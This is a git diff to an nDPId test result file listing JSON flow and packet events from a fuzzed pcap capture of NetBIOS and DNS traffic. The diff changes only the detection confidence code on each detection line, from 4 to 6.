a/test/results/fuzz-2006-06-26-2594.pcap.out b/test/results/fuzz-2006-06-26-2594.pcap.out index 5b6bf2b59..e1c4dbea6 100644 --- a/test/results/fuzz-2006-06-26-2594.pcap.out +++ b/test/results/fuzz-2006-06-26-2594.pcap.out 
@@ -2,70 +2,70 @@ 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1120469540839} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469540839,"flow_last_seen":1120469540839,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469540839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1120469540839,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469540839,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOaYwAAIARTMHAqAECwKgB\/wCJAIkAOlu0hOcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPU0FDQUNBQ0FDQUJNAAAgAAE="} 
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469540839,"flow_last_seen":1120469540839,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469540839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469540839,"flow_last_seen":1120469540839,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469540839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1120469541585,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469541585,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOaYkAAIARTMDAqAECwKgB\/wCJAIkAOlu0hOcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAA2AAE="} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469542336,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1120469542336,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469542336,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOaY4AAIARA7\/ZqAECwKgB\/wCJAIkAOlu0hOcBEAABaQAAAAAAIEVGRURFSkZQRUVFUEVORUIFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469551656,"flow_last_seen":1120469551656,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469551656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1120469551656,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120469551656,"pkt":"ADBUMjQlcwDtAW69CABFAAA+aY8AAIARTczAqAECwKgBAQqYADUAKiNDstABAAABAAAAAADPA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469551656,"flow_last_seen":1120469551656,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469551656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469551656,"flow_last_seen":1120469551656,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469551656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469552651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1120469552651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120469552651,"pkt":"ADBUADRWAODtAW69CABFAAA+aZAAAIARTcvAqAECwCVzAAqYADUCKiNDstABAAABAAAAAAAAA3NpcAljeWJlcmNydHkCZGsAAAEAAQ=="} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469552651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercrty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469552651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercrty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554654,"flow_last_seen":1120469554654,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469554654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":49973,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1120469554654,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120469554654,"pkt":"ADBUADRWAODtAW51CABFAAA+aZEAAIARlcrAqAECwKgBAQqYwzUAKiNDstABAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":200000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1120469554824,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1120469554824,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":144,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":144,"pkt_l4_len":110,"thread_ts_msec":1120469554824,"pkt":"AODtAW69ADBUADRWCABFAACCAABAAEARtxfAqAEDwKgBAgA1CpgAbjxwstCBgAABAAEAAgABA3NpcAljeWJlcmNpdHkCZGsAAAEAAcAMAAEAAQBAASwABNTyISPAEAACAAEAAACJAAYDbnMywBDAEAACAAEAAACJAAYDbnMxwBDAUAABAAEAAACJAATU8in4"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":200000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1120469554824,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":4,"reply_code":0,"query_type":0,"rsp_type":1,"rsp_addr":"212.242.33.35"}} 
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":200000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1120469554824,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":4,"reply_code":0,"query_type":0,"rsp_type":1,"rsp_addr":"212.242.33.35"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469555830,"flow_last_seen":1120469555830,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469555830,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1120469555830,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469555830,"pkt":"ADBUADRWAODtAW69CABFAABIaZIAAIARTb\/AqAECwKgBAQqZADUANN1ZTNIBAAABAAAAACWHAF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469555830,"flow_last_seen":1120469555830,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469555830,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":24435,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469555830,"flow_last_seen":1120469555830,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469555830,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":24435,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469556827,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1120469556827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469556827,"pkt":"ADBUADRWAODtAW69CABFAABIaZMAAIARTb7AqAFuwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5JXMAJXMAAAE="} -00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469556827,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":9587,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469556827,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":9587,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":12,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":27904,"global_ts_msec":1120469558830} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":27904,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469556827,"pkt":"ADBUADRWAODtAW69bQBFAABIaZQAAIARTb3QqAECwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAMX3VkcINzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469560833,"flow_last_seen":1120469560833,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469560833,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2597,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1120469560833,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469560833,"pkt":"ADBUADRWAODtAW69CABFAABIaZUAAIARTbzAqAECwKgBAQolcwAANN9ZTE4BAAABACVzAAAABF9zaXAEX1VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1120469564839,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469564839,"pkt":"ADBUADRWAODtAW69CABFAABIaZYAAIARTbvAqAECwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469555830,"flow_last_seen":1120469564839,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469564839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469555830,"flow_last_seen":1120469564839,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469564839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572841,"flow_last_seen":1120469572841,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469572841,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1120469572841,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469572841,"pkt":"ADBUADRWAODtAW69CABFAABEaZcAAIARTb7AqAECwKgBAQqaADUAMHlSV9IAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572841,"flow_last_seen":1120469572841,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469572841,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572841,"flow_last_seen":1120469572841,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469572841,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 